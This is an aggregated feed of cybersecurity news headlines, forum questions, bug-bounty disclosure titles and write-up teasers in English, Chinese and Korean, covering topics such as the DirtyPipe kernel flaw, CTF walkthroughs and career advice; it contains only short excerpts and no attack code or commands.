    LockBit 2.0 ransomware bugs and database recovery attempts
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    CVE-2022-24696 – Glance by Mirametrix Privilege Escalation
    When investigating my laptop, I stumbled upon something interesting that resulted in privilege escalation. I use a Lenovo ThinkPad X1 Extreme Gen 1, which has an installed software named Glance, for my day-to-day work. The purpose of this software is to use the advanced web camera to figure out if you are speaking when the... The post CVE-2022-24696 – Glance by Mirametrix Privilege Escalation appeared first on TrustedSec.
  • Open

    What's the best free security scan tool for C/C++ files?
    My team needs to run a security analysis on an entire Github repo that includes mostly C/C++ files (a couple of non-C/C++ files are there too). What's the best free security scan tool that can be used to scan a repo in a Linux environment and scan all C/C++ files in the directories/subdirectories of the repo for bugs, vulnerabilities, code smells, etc.? submitted by /u/techsavvynerd91 [link] [comments]
    Are the type of "Flood" attacks really important?
    Hey folks, I'm learning about DDoS attacks, and I see a lot of ICMP floods, UDP floods, HTTP floods, etc. At the end of the day, the attacker sends Ethernet frames to the victim server and its network, so if we look only at how it affects the bandwidth of server or network devices, there isn't any. In my point of view, it's can only help to pass some obstacles. For example, the Firewall blocks ICMP requests, but not HTTP because it legitimate requests from a web server like Amazon. Maybe the difference can be significant if we talk about exhausting CPU and RAM because probably HTTP GET or POST can require the server to do a lot more than ICMP protocol. I get it right or totally messed up something? Thanks. submitted by /u/Webly99 [link] [comments]
    Car transmission hack
    I'm a target of hackers right now. They have hacked my car alarm to beep nonstop. Now for the first time yesterday my car was hacked to go from D to Neutral while driving. Any thoughts on how they did it? Don't tell me to get maintenance on my car, I'm a former mechanic and it's not a transmission problem... submitted by /u/Dogfish18 [link] [comments]
    Accessing home server from outside home - Possible methods without publicly opening access?
    Hello! I have a very basic homeserver connected to a router via LAN. I use it for Plex and nextcloud. I am pretty technologically adept, but I am not close to being adept at networking or security. I do take my privacy some what seriously and I'm assuming that simply portforwarding my Plex and Nextcloud instances to be able to access them outside of my house is dangerous. But I'm also in a position where I'm not informed enough to do something different. I can easily follow guides to do stuff and can troubleshoot. The homeserver runs Ubuntu. Are my doubts about portforwarding unfounded? If not, what other alternatives can I use to remotely access my homeserver and how would I go about installing them? I'm sorry if this is a very stupid question, as I said before, I'm not adept when it comes to networking and security.. Thanks in advance! submitted by /u/sadhgurukilledmywife [link] [comments]
    Tencent's VooV Meeting - Thoughts?
    It looks like my team is being cornered into installing VooV Meeting for some management meetings for various reasons. I've suggested using the web-based version, which hasn't seemed to work in their test meetings. I'm looking for some opinions on the use of this meeting software. I'm already planning to install it for the requested meeting, then immediately uninstall it afterwards. Considering further measures. Am I being paranoid? submitted by /u/unseenspecter [link] [comments]
  • Open

    CVE-2020-3452 Cisco ASA / Firepower Read-Only Path Traversal Vulnerability - https://esccvc.de.ibm.com
    IBM disclosed a bug submitted by 0xelkomy: https://hackerone.com/reports/938684
    Public Jenkins instance with /script enabled
    IBM disclosed a bug submitted by thesanjok: https://hackerone.com/reports/1492447
  • Open

    Yamagata XSS journey
    Hi readers! This write-up is about my yamagata XSS labs journey. There is a total of 19 stages in this lab. We have to execute the… Continue reading on Medium »
  • Open

    ‘We are not ready’: a cyber expert on US vulnerability to a Russian attack
    Article URL: https://www.theguardian.com/technology/2022/mar/10/us-russia-cyber-attack-prepared Comments URL: https://news.ycombinator.com/item?id=30642010 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-03-11 Review
    网络安全2022:守望高质量-PDF by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-11 Review
    网络安全2022:守望高质量-PDF by ourren 更多最新文章,请访问SecWiki
  • Open

    [ Hack The Box ] Kryptic Ransomware - Writeup
    Europol EC3 is looking for clues that will lead to the arrest and prosecution of the Enigma Team leader. Continue reading on Medium »
    Managing your licenses in Lampyre
    If you have been following us on Medium for a while, you might have read our ‘OSINT 101 with Lampyre’ article, which is basically a good… Continue reading on Medium »
    OhSint Machine
    This is a walkthrough for the Osint Machine from TryHackMe . They just give us an image. Let’s open the image, we get the image of… Continue reading on Medium »
    How to find someone on OnlyFans?
    How to find someone on OnlyFans? We’ve been chatting to some experts in online investigations, what we found out was pretty useful. Continue reading on Medium »
    How to Find Someone on POF?
    Are you trying to find someone, that perhaps shouldn’t be on Plenty of Fish (POF)? Continue reading on Medium »
  • Open

    Introducing the mystery lab challenge
    For anyone who's used the Web Security Academy before, you'll be pretty familiar with the format. For those of you who haven't had the pleasure, the process goes a little bit like this: Select a set o
  • Open

    Introducing the mystery lab challenge
    For anyone who's used the Web Security Academy before, you'll be pretty familiar with the format. For those of you who haven't had the pleasure, the process goes a little bit like this: Select a set o
  • Open

    System Hardening을 피해 RCE를 탐지하기 위한 OOB 방법들
    여러분들은 RCE(Remote Code Execution)를 식별하기 위해 어떤 방법을 사용하고 있나요? 저는 개인적으로 OOB(Out-of-band)를 즐겨서 사용합니다. Sleep 등 time 기반도 정확 하지만, 비동기 로직이 많은 요즘 time 보단 oob가 더 정확하다고 생각이 드네요. (물론 둘 다 체크하지만요 😊) 물론 서비스의 인프라에 따라서 외부로의 Outbound 요청이 제한되는 곳이 많을겁니다. 다만 보통 일반적인 트래픽에 대한 제한이 있지, DNS Query 까지 막는 경우는 많지 않습니다. (내부 DNS를 타고 공격자의 도메인을 쿼리하면 결국 공격자는 OOB로 웹 요청을 시도했다는 것을 알 있죠)
  • Open

    约翰·卡马克:怎么会有人不喜欢电子游戏呢?
    游戏之神
    用安全守护金融,CIS 2021春日版金融科技分论坛回顾
    3月9日下午,「CIS 2021网络安全创新大会Spring·春日版」金融科技安全专场成功进行线上直播。
    全国政协委员肖新光:三份提案聚焦推进网络安全想定推演、 IT供应链网络安全能力和软件安全工程的建设
    3月10日,中国人民政治协商会议第十三届全国委员会第五次会议在北京闭幕。本届两会,全国政协委员、安天集团创始人肖新光提交三份提案,聚焦推进网络安
    FreeBuf周报 | 三星被公开了源代码和190GB机密数据;Firefox再爆两个0Day漏洞
    继NVIDIA核心源代码75GB的机密数据和核心源代码被泄露后,勒索组织公开了韩国三星电子150GB的机密数据和核心源代码。
    僵尸网络Emotet卷土重来,已感染179个国家的13万台设备
    Emotet自去年11月复出以来发展迅猛,且具备了以往所没有的新功能。
    密码学的安全性浅析2
    分组密码是一种对称密钥算法。它将明文分成多个等长的模块,使用确定的算法和对称密钥对每组分别加密解密。分组加密是极其重要的加密协议组成,其中典型的如AES和3DES作为美国政府核定的标准加密算法。
    挑战亚马逊微软云市场“一哥”地位,谷歌拟54亿美元收购网安公司Mandiant
    如收购成功,Mandiant将加入谷歌的云计算部门,以更好地和亚马逊AWS和微软Azure在云市场开展竞争。
    为对抗制裁,俄罗斯决定自建TLS根证书
    目前,俄罗斯政府已经决定自己创建一个证书颁发机构,提供独立颁发和更新 TLS 证书的解决方案。
    观仔讲堂 | APT钓鱼邮件分析
    近期有同事反映疑似收到了钓鱼邮件。发件人也是公司同事的名字,但发件邮箱 comercial1@qualitypro.com.co不是公司的邮箱
    CIS2021 春日版安全合规专场线上直播回顾,网安大咖建言献策共谋实践与发展
    安全合规是不少企业的痛点,在CIS2021 春日版安全合规专场,5位大咖通过各自具有建设性的议题,探讨企业合规建设之路。
    CIS 2021春日版「5G与人工智能安全」专场议题回顾:5G助力安全走上快车道
    人工智能与产业结合推动爆发式增长是未来我国移动互联网发展的重大趋势之一。这样的大背景下,网络信息安全也被赋予了更广泛更深刻的定义。
    黑客使用受污染的DDoS工具瞄准乌克兰的IT军队
    威胁参与者正在使用 一种模仿Liberator的窃取信息恶意软件,这种工具是亲乌克兰黑客用于攻击俄宣传网站的常用工具。
    汽车之家招聘网络安全实习生
    汽车之家成立于2005年,致力于为消费者提供一站式的看车、买车、用车服务,提供优质的汽车消费和汽车生活服务。
    浅谈云时代如何解决身份管理
    基于云的 OneAuth 服务可以通过在所有这些应用程序中提供单点登录 (SSO) 来缓解这些问题,为用户提供一个使用单个用户名和密码访问其所有资源的中心位置。
  • Open

    Linux 内核权限提升漏洞“DirtyPipe”(CVE-2022-0847)分析
    作者:启明星辰ADLab 原文链接:https://mp.weixin.qq.com/s/RoGHvNW2Y6dZOjgsBVVm5Q 01 漏洞详情 近日,研究人员披露了一个Linux内核本地权限提升漏洞,发现在copy_page_to_iter_pipe和 push_pipe函数中,新分配的pipe_buffer结构体成员“flags”未被正确地初始化,可能包含旧值PIPE_BUF_FL...
    Linux 内核权限提升漏洞“DirtyPipe”(CVE-2022-0847)分析
    作者:启明星辰ADLab 原文链接:https://mp.weixin.qq.com/s/RoGHvNW2Y6dZOjgsBVVm5Q 01 漏洞详情 近日,研究人员披露了一个Linux内核本地权限提升漏洞,发现在copy_page_to_iter_pipe和 push_pipe函数中,新分配的pipe_buffer结构体成员“flags”未被正确地初始化,可能包含旧值PIPE_BUF_FL...
    Linux 内核提权 DirtyPipe(CVE-2022-0847) 漏洞分析
    作者:ghost461@知道创宇404实验室 时间:2022年3月11日 简介 2022年2月23日, Linux内核发布漏洞补丁, 修复了内核5.8及之后版本存在的任意文件覆盖的漏洞(CVE-2022-0847), 该漏洞可导致普通用户本地提权至root特权, 因为与之前出现的DirtyCow(CVE-2016-5195)漏洞原理类似, 该漏洞被命名为DirtyPipe。 在3月7日, 漏...
    Linux 内核提权 DirtyPipe(CVE-2022-0847) 漏洞分析
    作者:ghost461@知道创宇404实验室 时间:2022年3月11日 简介 2022年2月23日, Linux内核发布漏洞补丁, 修复了内核5.8及之后版本存在的任意文件覆盖的漏洞(CVE-2022-0847), 该漏洞可导致普通用户本地提权至root特权, 因为与之前出现的DirtyCow(CVE-2016-5195)漏洞原理类似, 该漏洞被命名为DirtyPipe。 在3月7日, 漏...
  • Open

    Linux 内核权限提升漏洞“DirtyPipe”(CVE-2022-0847)分析
    作者:启明星辰ADLab 原文链接:https://mp.weixin.qq.com/s/RoGHvNW2Y6dZOjgsBVVm5Q 01 漏洞详情 近日,研究人员披露了一个Linux内核本地权限提升漏洞,发现在copy_page_to_iter_pipe和 push_pipe函数中,新分配的pipe_buffer结构体成员“flags”未被正确地初始化,可能包含旧值PIPE_BUF_FL...
    Linux 内核权限提升漏洞“DirtyPipe”(CVE-2022-0847)分析
    作者:启明星辰ADLab 原文链接:https://mp.weixin.qq.com/s/RoGHvNW2Y6dZOjgsBVVm5Q 01 漏洞详情 近日,研究人员披露了一个Linux内核本地权限提升漏洞,发现在copy_page_to_iter_pipe和 push_pipe函数中,新分配的pipe_buffer结构体成员“flags”未被正确地初始化,可能包含旧值PIPE_BUF_FL...
    Linux 内核提权 DirtyPipe(CVE-2022-0847) 漏洞分析
    作者:ghost461@知道创宇404实验室 时间:2022年3月11日 简介 2022年2月23日, Linux内核发布漏洞补丁, 修复了内核5.8及之后版本存在的任意文件覆盖的漏洞(CVE-2022-0847), 该漏洞可导致普通用户本地提权至root特权, 因为与之前出现的DirtyCow(CVE-2016-5195)漏洞原理类似, 该漏洞被命名为DirtyPipe。 在3月7日, 漏...
    Linux 内核提权 DirtyPipe(CVE-2022-0847) 漏洞分析
    作者:ghost461@知道创宇404实验室 时间:2022年3月11日 简介 2022年2月23日, Linux内核发布漏洞补丁, 修复了内核5.8及之后版本存在的任意文件覆盖的漏洞(CVE-2022-0847), 该漏洞可导致普通用户本地提权至root特权, 因为与之前出现的DirtyCow(CVE-2016-5195)漏洞原理类似, 该漏洞被命名为DirtyPipe。 在3月7日, 漏...
  • Open

    Gallery Tryhackme Walkthrough part-1
    No content preview
    TryHackMe writeup: Steel Mountain
    Steel Mountain is a TryHackMe room that sports a Mr. Robot theme. It is great for those into hacking shows an new to the scene! Continue reading on InfoSec Write-ups »
  • Open

    Gallery Tryhackme Walkthrough part-1
    No content preview
    TryHackMe writeup: Steel Mountain
    Steel Mountain is a TryHackMe room that sports a Mr. Robot theme. It is great for those into hacking shows an new to the scene! Continue reading on InfoSec Write-ups »
  • Open

    Gallery Tryhackme Walkthrough part-1
    No content preview
    TryHackMe writeup: Steel Mountain
    Steel Mountain is a TryHackMe room that sports a Mr. Robot theme. It is great for those into hacking shows an new to the scene! Continue reading on InfoSec Write-ups »

  • Open

    XSS via Mod Log Removed Posts
    Reddit disclosed a bug submitted by ahacker1: https://hackerone.com/reports/1504410 - Bounty: $6000
    Open Redirect on https://.8x8.com/login?nextPage=%2F
    8x8 disclosed a bug submitted by ig420_vrush: https://hackerone.com/reports/1467046
  • Open

    How I was able to read any users confidential reports on a public level domain
    Hello all, today’s write up is about how I chained IDOR with BAC to read any users confidential reports on a public domain (we will call… Continue reading on Medium »
    Bypassing CSRF token protection by abusing a misconfigured CORS policy
    So, today I am going to teach you about a cool and interesting way of bypassing the token protection used against CSRF attacks by finding… Continue reading on Medium »
    Explore DeNet ecosystem and get a reward
    DeNet users can benefit while just exploring the ecosystem: perform tasks and simply check-in the app. Continue reading on DeNet | DFILE »
    Nexus Mutual Bug Bounty Matching Program Pays $200,000 To Whitehat
    The Nexus Mutual trial bug bounty matching program has just provided its first matching payout as part of its partnership with Immunefi: a… Continue reading on Immunefi »
  • Open

    CrowdSec releases first threat landscape report based completely on crowdsourced data from the community of CrowdSec users
    submitted by /u/klausagnoletti [link] [comments]
  • Open

    Moving from support engineer to cyber security?
    Hello. Soon I start a support engineer job making 60k. Can I get a security analyst job after with the right certifications? Should I look for an NOC Job or something similar. Will that make at least 60k. What should I do? submitted by /u/throwaway_69333 [link] [comments]
    increasing range of wifi adapter
    So is there a way to increase the range of my awus1900 ? the only way for me to connect to a wifi far away is to throw it out the window like literally XD i was thinking like an bigger antenna for it if that would work, it already has very good range but i find that it cant connect to wifis even tho it sees them if they are like 50meters away tried putting it up on the roof but the range was better on the ground with all the buildings blocking it for some reason well i have no idea how this works so thats why im asking submitted by /u/Y0SH1zzzz [link] [comments]
    GCP Security Audit
    Hi there, I never had experience with Google Cloud Platform. There is a possibility to make fast audit of: Publicly exposed GCP hosts; GCP permissions for assigning external IP; GCP firewall rules For all projects (I have 40 projects) in organization? submitted by /u/athanielx [link] [comments]
    Streaming websites asking for script permission
    Hey, some websites I've visited asks for permission to run a script called ????.com/remote_control.php, it gets blocked by NoScript. Wondering if this is a common script used in video streaming or if it is as malicious as it sounds? submitted by /u/Pollyypop [link] [comments]
    Does Alienvault upload any of our data?
    Hi Guys, We're looking to deploy Alienvault OSSIM in our environment as a SIEM monitoring tool. I have reviewed this with my team and the major concern we have is whether Alienvaul uploads any of our data into the cloud and what exact data do they upload but I can't seem to find any resources online that explicitly state that. I was wondering if anyone here has any ideas/knowledge on this? Also happy if anyone has any suggestions on other free and open-source SIEM tools that can be used. submitted by /u/thetayoo [link] [comments]
    Career Switch 2.0
    Hey guys.. So... I would like to ask you guys a couple of things as this is gonna be a very new topic and a new chapter for me in my life. I am 27 y/o knows batxhit about software/coding/development etc. I am always smart when it comes to the hardware side of computers and mobile devices. Always find the fixes around and get the thing up and running. However, I want to get into EH or a related field Anyways, I have been in customer service for the past 7 years and that was because I was not able to pursue my dream in IT as I was broke T_T. But now I got the chance of either shifting to another country and learning and finding a job or staying here and finding a job.. So I would like to ask a few couples of questions from you guys about how tough and how badly gonna it affect me as it's a whole next level chapter for me. Note that, I am bad at maths. (like i never learnt it in advance level) What is the study path? What's the best country to shift to for studies? (Thinking of Canada/US/UK) Is it necessary for me to start from scratch like doing a certificate > diploma > degree > masters or whatever? Sites/platforms where I could study things related to the field? How badly is it going to affect me with the switch since it is all new? What are the pros and cons of getting into this field? Any other advice or suggestions that comes to your head. :) Edit : One more point I would like to add after seeing the comment from this guy; What's the study path and career path for Hardware hacking? Thank you so much! Love you all <3 submitted by /u/PapadumSriLanka [link] [comments]
    Tenable - Audit Scan - No result
    Hello AskNetsec, I am trying to run a CIS L1 Compliance scan on my Microsoft Windows Server 2012 R2 Datacenter, and Microsoft Windows Server 2016 Datacenter though I keep getting no results. When I run a Debug scan it says the following: "Nessus has not identified that the chosen audit applies to the target device." It might be the case, though I am unsure as to what CIS scan to use instead. I would appreciate your help on this case. Thank you in advance. ________________________________________________________________________ Device full name, OS and version: "Mircrosoft Windows Server 2012 R2 Datacenter 6.3.9600" Chosen CIS: "Cis Windows Server 2012 DC L1 v2.2.0" And: "Cis Windows Server 2012 R2 DC L1 v2.5.0" _________________________________________________________________________ Device full name, OS and version: "Mircrosoft Windows Server 2016 Datacenter" Chosen CIS: "Cis Windows Server 2016 DC L1 v1.3.0" submitted by /u/Gabbana2 [link] [comments]
    Potential doxx advice
    I was advised by a reply in r/AskComputerScience to post here, so here it is. ​ Hi I was on a call with someone on Discord who I didn't know on a personal level and they told me some information about myself that is not public anywhere e.g. my full name, address etc (my Discord also is not linked to anything except my Steam account). I was wondering if anyone has any insight on how they managed this. It has quite shook me up as I have never had this happen to me before as I am as careful as I can be with what information I give out online and always have been. Thanks submitted by /u/Confident_Lobster180 [link] [comments]
  • Open

    Ask HN: How would the Dirty Pipe vulnerability be exploited on Android?
    I have seen articles claiming that the Dirty Pipe vulnerability could cause security issues and even root access on Android devices with the vulnerable kernel version. Can you explain how this would happen, as I presume each applications is isolated through virtualization? Comments URL: https://news.ycombinator.com/item?id=30629680 Points: 2 # Comments: 1
  • Open

    If you're interested, the Microsoft Detection and Response Team (DART) will be holding an AMA next Tuesday on Tech Community answering questions on incident response and more
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    SecWiki News 2022-03-10 Review
    使用 CodeQL 分析 Dubbo RCE by ourren 基于依赖性分析的软件供应链评估指标对预测npm包的流行程度变化 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-10 Review
    使用 CodeQL 分析 Dubbo RCE by ourren 基于依赖性分析的软件供应链评估指标对预测npm包的流行程度变化 by ourren 更多最新文章,请访问SecWiki
  • Open

    Pentesting toolkit: all you need to know
    “A Penetration Test is a technical assessment designed to achieve a specific goal.” Continue reading on Faraday »
    My Red Team Approach
    Initially, we conduct passive and active information gathering from publicly available sources to analyze which information is valuable… Continue reading on Medium »
    Red Team Tricks And Techniques
    Why Do I use VBA? Continue reading on Medium »
    Reflective DLL Injection
    Reflective DLL injection is a code injection technique that loads into a target process from memory. Reflective DLL injection is… Continue reading on Medium »
  • Open

    Rust fuzzing using cargo-libafl (LibAFL-based fuzzer)
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    K8S安全学习(一)
    最近在学习K8S相关云原生技术,因为工作中正好接触到,便一直想找个机会深入学习一下这个方向的利用与防御,于是便有了这篇文章
    从网络空间认知战到对俄大规模网络致瘫攻击
    此次监测到的大规模网络攻击事件,战术手段和攻击发动方式历史鲜有,绿盟科技天元实验室对此次网络攻击进行了详细的技战术研判分析。
    21万FB用户「跨越时空」共享CIS 2021春日大会
    数说CIS 2021大会春日版,我们用数据呈现答案。
    FreeBuf早报 |多家俄政府网站遭到供应链攻击;英公布新规以应对激增的诈骗广告
    多家俄罗斯政府网站遭到供应链攻击一些俄罗斯联邦机构的网站遭遇了供应链攻击,攻击者破坏了一些政府机构用来跟踪访问者数量的统计工具。
    CIS2021 DevSecOps应用与技术专场圆满落幕,网安大咖共话安全
    3月10日上午,CIS2021 DevSecOps应用与技术专场在FreeBuf官网全程直播,与万千网友共享,一同欣赏精彩的议题。
    CPU又曝大bug,涉及英特尔、AMD、ARM
    安全人员发现了一种新方法,可以绕过现有的基于硬件的防御措施,在英特尔、AMD和ARM的计算机处理器中进行推测执行。
    ​APP合规实践3000问之二
    上一篇文章《App合规实践3000问》发出后得到了大家的热烈反响,盼望着,盼望着,我们带着合规实践3000问第二篇大步走来了。
    小数据人工智能的巨大潜力
    我们从研究进展、国家竞争力和资金方面介绍了我们对研究集群中所有论文的研究结果。我们希望通过这些分析,发现这些方法的当前和预期科研进展,判断哪个国家处于领先地位以及这项研究的主要资金来源。
    【完整版PDF下载】Conti泄露数据完整分析,疑似成员身份被曝光!
    俄乌冲突加剧,黑客团队选边加入。2月27日Conti 勒索软件组织的内部数据遭到大量泄露,从聊天记录到疑似成员身份被曝光。
    CIS 2021 春日版数据安全论坛圆满落幕,精彩议题不容错过
    数据安全论坛深入探讨最新的数据安全保护技术、最佳的运营体系。
    惠普解决了16个影响笔记本电脑、台式机、PoS 系统的UEFI固件缺陷
    近期,网络安全公司Binarly研究人员发现16个影响惠普企业设备的统一可扩展固件接口高危漏洞。
    智能化车联网面临安全考验
    随着汽车联网率的不断提升,预计未来此类安全问题将更加突出。
  • Open

    Digital Forensics
    Hello all. Had a question, I've been looking for a internship in Digital Forensics. Any suggestions, been looking everywhere. Just want to get my foot in the door. Or anyone that can mentor me. I'm in the USA. submitted by /u/Sudden_Ad9859 [link] [comments]
    Forensic collections of O365 mailboxes
    As the title suggest, what are people using/doing to collect O365 mailboxes that is not using the Microsoft Compliance eDiscovey portal. aka Nuix Workstation (GraphAPI), MailStore Client, so on so forth. Any information on pro's and con's for the method you use and any possible hiccups you have found during the course of using these apps. submitted by /u/Phorc3 [link] [comments]
  • Open

    先知蜘蛛黑客利用 CVE-2021-22941漏洞传送Webshell
    译者:知道创宇404实验室翻译组 原文链接:https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/ 2022年初,CrowdStrike Intelligence 和 CrowdStrike Services 调查了一起事件,在这起事件中,PROPHET SPIDER(先知蜘蛛) 利用了影响 Ci...
    先知蜘蛛黑客利用 CVE-2021-22941漏洞传送Webshell
    译者:知道创宇404实验室翻译组 原文链接:https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/ 2022年初,CrowdStrike Intelligence 和 CrowdStrike Services 调查了一起事件,在这起事件中,PROPHET SPIDER(先知蜘蛛) 利用了影响 Ci...
  • Open

    先知蜘蛛黑客利用 CVE-2021-22941漏洞传送Webshell
    译者:知道创宇404实验室翻译组 原文链接:https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/ 2022年初,CrowdStrike Intelligence 和 CrowdStrike Services 调查了一起事件,在这起事件中,PROPHET SPIDER(先知蜘蛛) 利用了影响 Ci...
    先知蜘蛛黑客利用 CVE-2021-22941漏洞传送Webshell
    译者:知道创宇404实验室翻译组 原文链接:https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/ 2022年初,CrowdStrike Intelligence 和 CrowdStrike Services 调查了一起事件,在这起事件中,PROPHET SPIDER(先知蜘蛛) 利用了影响 Ci...
  • Open

    [ Hack The Box ] Intel - Writeup
    It seems a huge trove of credit card details is being sold by a group going by the name flinchsec. Can you find any sites or artefacts… Continue reading on Medium »

  • Open

    Helpful Bug Bounty Resources
    Eight resources to help you on your bug bounty journey Continue reading on Medium »
    Hacking with sqlmap
    Sqlmap : Continue reading on Medium »
    OTP bypass via response manipulation and brute forcing.
    Hello Hackers, Continue reading on Medium »
    Introduction to Simple Buffer Overflow
    This article will provide an overview of exploit development, with a focus on creating Simple Buffer Overflow exploits. I’ll try to keep… Continue reading on Medium »
    The 10 Best Programming Languages for Hacking
    Before diving into this, it would be great to note that your programming of choice will much depend on the type of system you are… Continue reading on Medium »
    How To Become a Good Hacker? The Fundamental Skills
    These are the basics that every hacker should know before even trying to hack. Once you have a good grasp on everything in this section… Continue reading on Medium »
  • Open

    Do you grind or just learn on your own pace?
    Hii, So I just graduated 2 months ago. I did one interview with a super cool guy in a cyber security company for a infosec job. He helped me a lot and liked the way i think although i had many shortcomings. He told me to study network+ and eLearnsecurity web penetration. And to keep practicing on hackthebox. Then interview again The problem is that i have a military service in 4 months,and it’s obligated. Currently i am studying Mike Myers on Udemy for networks+ i read some refrence books sometimes. And when i finish it i will start building my own network lab on gns3. For the practical side i am practicing on hackthebox,just ranked from noob to script kiddie. I still read writeups a lot and get stuck after i find a vulnerability or sometimes even at enumeration. My question is that,did you ever grind and work hard to achieve bigger outcomes in shorter time? I feel like i should study more ,i mean like i should stay up all night 2 days a week to finish all of that . And i feel like i should spend almost all of my day hacking. Sure i can go out for an hour or two ,but that is that. I fear i will have a burnout but i also fear that i will keep learning basic stuff and take me forever to land a job. I want to be a pro and i know it’s fucking hard but this is my passion since i used to create RATS during high school. I feel i should give it everything i have. I am introvert with almost no friends anyways so why not ? is grinding mindset useful here? submitted by /u/Ramseesthe4th [link] [comments]
    Security risk analysis from Trojan?
    Hi there, Usually I'm very vigilant and can easily spot most net security scams and am educating others on how to avoid them. However at one of my jobs I've been waiting on someone to send me a report for a few weeks now and when an e-mail came up today on my work e-mail that looked to be that report, I finally fell for a viral e-mail. Basically the report was on a spreadsheet that I downloaded on the email through Thunderbird. It said that I needed to enable editing or press the view in browser button. This didn't make any sense to me and there was no "enable editing" thing that it mentioned, so that did ring alarm bells, but because I was waiting on a similar report from my upper manager, I ignored that and pressed the view in browser button. Now I'm not sure if this was prompted by my…
    Vulnerability Management
    Tracking Sec+ as a foundational certification but what additional certifications are valuable to have when seeking employment in the vulnerability management field? submitted by /u/5Crabby1s [link] [comments]
    SNMPv3 Password best practice.
    I have taken over a 15 segment switch network that has been neglected in the use of best practices for many years. I have migrated from telnet to ssh, local logins to RADIUS, and so on. The only push back from my coworkers is the users and passwords for SNMPv3. They want each segment have it own user and password, i.e. admin1 password1 for site 1, user2 password2 for site 2. We do this for the local passwords in case the site can't reach the RADIUS server. I do not care per say but I can't find any useful information on this particular topic and the monitoring systems we use make it difficult to set up SNMPv3 alone and it goes down hill from there when setting up multiple users and passwords. In addition, we only use SNMP for monitoring. Can anyone direct me to some good information on this topic or if the can take a moment of their time to explain it here? - Thank you in advance submitted by /u/NetworkRex [link] [comments]
    How could Russian military communication system require 3G or better to work?
    Christo Grozev, leader of Bellingcat, claims the Russian military communication system Quartz (or Era) requires UMTS (3G) bandwidth in order to work. Or at the very least, I assume it's the bandwidth requirement which makes GSM (2G) insufficient. https://twitter.com/christogrozev/status/1500978613113524229?s=20&t=coMiAhwmqZQY5Wh60W9h4A I would have guessed Russian military phones used familiar protocols from the good old TLS suite. I.e. RSA/ECDSA for key exchange, AES for symmetric keys, and pre-installed FSB root CAs and individual client certs. Do you have any hypothesis on what design Quartz could have to make GSM bandwidth insufficient? Allegedly, two Russian operatives had to resort to unprotected GSM for a phone call. How is it possible that their encryption suite creates a so heavy data overhead? Do you have other hypotheses, unrelated to bandwidth requirements? submitted by /u/engineerL [link] [comments]
    How a Front-End Developer can get into Netsec?
    Hi everyone! I'm a 23 year old Web Dev (working for 3 years). Few mouth ago I decided that I wanted to change the direction of my career and get into cyber security. My ultimate goal or a dream job in security would be probably to become a penetration tester that works with a team of experts on getting into businesses through the network vunrebilities, services misconfiguration or physically by phishing, social engineering and trying to get in the building (of course legally) I recon it's a very specialised job and definitely not an entry level but I think it's important to mention the end goal to get the whole picture. I researched a lot about becoming a pentester. I spend my time on TryHackMe as well as rooted some retired machines on HackTheBox of course using Kali, yet, I feel I lack A LOT of knowledge and credibility, so here lies my problem. I fell into a rabbit hole of googling "which cert is the best", "how to become X", "best way to Y". So rather than digging deeper and deeper I figured I'll just ask my own questions. Of course, what certs should I get? OSCP is an obvious answer, but I don't feel like I'm ready, also I never got a cert in my life AND it's pretty expensive (I'm not even gonna mention SANS) Sec+ and Net+ are great intro certs but they don't really help with HR and I'm not sure if my web experience is enough for me. I feel like a have an okay grasp on network and security concepts. eJPT and eCCP learn you a lot, but are even less recognized by HR than CompTIA ones Isn't it better to take a step back and first try to become a SOC or sysadmin? Preferably Linux sysadmin Should I just concentrate on HTB, start a blog, get a PEN-200 and push for OSCP? Isn't it too risky? PS. Im planing on moving to Germany so I also spend time learning the language and I have 7 mouth before a move out. I set myself a goal to get my Netsec job there. I hope what I said makes sense. submitted by /u/Anvvir [link] [comments]
    What's exactly considered DoS/DDoS attack? (Multiple Cases)
    Hey folks, I want to know exactly the definition and I'll tell you why it's confusing me. Here are some cases: 1. I sent a file that is actually an endless "while" loop. This means Dos attack is every way of denying service by making the server use too many resources. 2. I sent a file that actually stops all the services/processes every five seconds. This means DoS attack is actually every way of denying a service. 3. I just sending a lot of ethernet frames in different ways (ping, HTTP, whatever). This means Dos attack is every way of denying a service only by massive requests amount. ** I know it's kind of ridiculous, but if it's actually any way of denying service, would you also consider someone that physically disconnected the server cables as Dos attack? ** If the definition is number 1, 2 machines that sent the same file - considered already as DDoS? Thanks! ​ BTW, is there an official list of the most common Dos/DDos attacks types in the last years? submitted by /u/Webly99 [link] [comments]
    Threat Model Stakeholders from a security team?
    Who are the appropriate personnel to include in a threat model from a security standpoint? Security Architects? Engineers? SOC analysts?? Vulnerability management personnel? Compliance? submitted by /u/bankster24 [link] [comments]
    RBAC question
    Hello, I am not in cyber however I am developing an org structure as part of my school assignment. The roles I came up with that are part of driving the RBAC implementation are: Role Dev Lead, Role Eng. Lead, Role Decomm. Lead, Role Maint. Lead and Auditor Lead. Are they close to RL roles? Thanks! submitted by /u/Hav0c_wreack3r [link] [comments]
  • Open

    Use of Unsafe function || Strcpy
    curl disclosed a bug submitted by shobhit2401200: https://hackerone.com/reports/1485379
    Binary output bypass
    curl disclosed a bug submitted by eliasknudsen: https://hackerone.com/reports/1468962
    Occasional use-after-free in multi_done() libcurl-7.81.0
    curl disclosed a bug submitted by luminixaaron: https://hackerone.com/reports/1463013
    Error Page Content Spoofing or Text Injection
    Krisp disclosed a bug submitted by mrirfan__07: https://hackerone.com/reports/1444031
    Unsubscripe linkes leaked
    Krisp disclosed a bug submitted by blackxxhat: https://hackerone.com/reports/1439025
    RXSS on https://equifax.gr8people.com on Password Reset page in the username parameter
    Equifax disclosed a bug submitted by miguel_santareno: https://hackerone.com/reports/1463638
    Race condition in endpoint POST fetlife.com/users/invitation, allow attacker to generate unlimited invites
    FetLife disclosed a bug submitted by trieulieuf9: https://hackerone.com/reports/1460373 - Bounty: $100
    High memory usage for generating preview of broken image
    Nextcloud disclosed a bug submitted by fancycode: https://hackerone.com/reports/1261225 - Bounty: $100
  • Open

